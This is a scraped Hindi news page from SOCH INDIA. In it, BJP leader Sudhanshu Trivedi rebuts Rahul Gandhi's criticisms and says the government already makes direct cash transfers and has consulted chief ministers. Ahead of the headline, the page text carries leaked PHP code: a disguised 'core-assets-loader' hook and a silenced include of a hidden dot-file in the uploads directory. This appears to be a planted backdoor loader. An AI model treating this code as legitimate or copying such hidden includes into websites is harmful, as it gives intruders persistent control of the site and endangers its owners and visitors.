add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); आरोप पर BJP का पलटवार- राहुल को तथ्यों के बारे में सही जानकारी रखनी चाहिए – SOCH INDIA
Menu

देश
आरोप पर BJP का पलटवार- राहुल को तथ्यों के बारे में सही जानकारी रखनी चाहिए

nobanner

कांग्रेस के पूर्व अध्यक्ष राहुल गांधी के आरोपों पर भारतीय जनता पार्टी (बीजेपी) ने पलटवार किया है. बीजेपी नेता सुधांशु त्रिवेदी ने कहा कि बिना किसी समझ और ज्ञान के बयान देना कांग्रेस की सामान्य प्रवृत्ति है. उन्हें (राहुल) इस बात की जानकारी नहीं है कि प्रधानमंत्री नरेंद्र मोदी ने तीन बार राज्यों के सीएम से चर्चा की है.

बीजेपी नेता सुधांशु त्रिवेदी ने कहा कि राहुल गांधी जी सीधे धन हस्तांतरण के बारे में कह रहे हैं, जो पहले से ही हो रहा है और कई राज्य सरकार भी ऐसा कर रही है. राहुल गांधी को कुछ ज्ञान हासिल करना चाहिए और कुछ तथ्यों को सीखना चाहिए.

राहुल गांधी के सुझावों पर सुधांशु त्रिवेदी ने कहा कि हमारी सरकार विपक्ष के सभी प्रकार के सुझावों का स्वागत करती है, लेकिन यह रचनात्मक और पर्याप्त होना चाहिए. राहुल गांधी को ऐसे तथ्य नहीं पता होंगे जो उनकी सामान्य प्रवृत्ति है, बिना तथ्यों को जाने और समझे वे मीडिया के सामने आते हैं.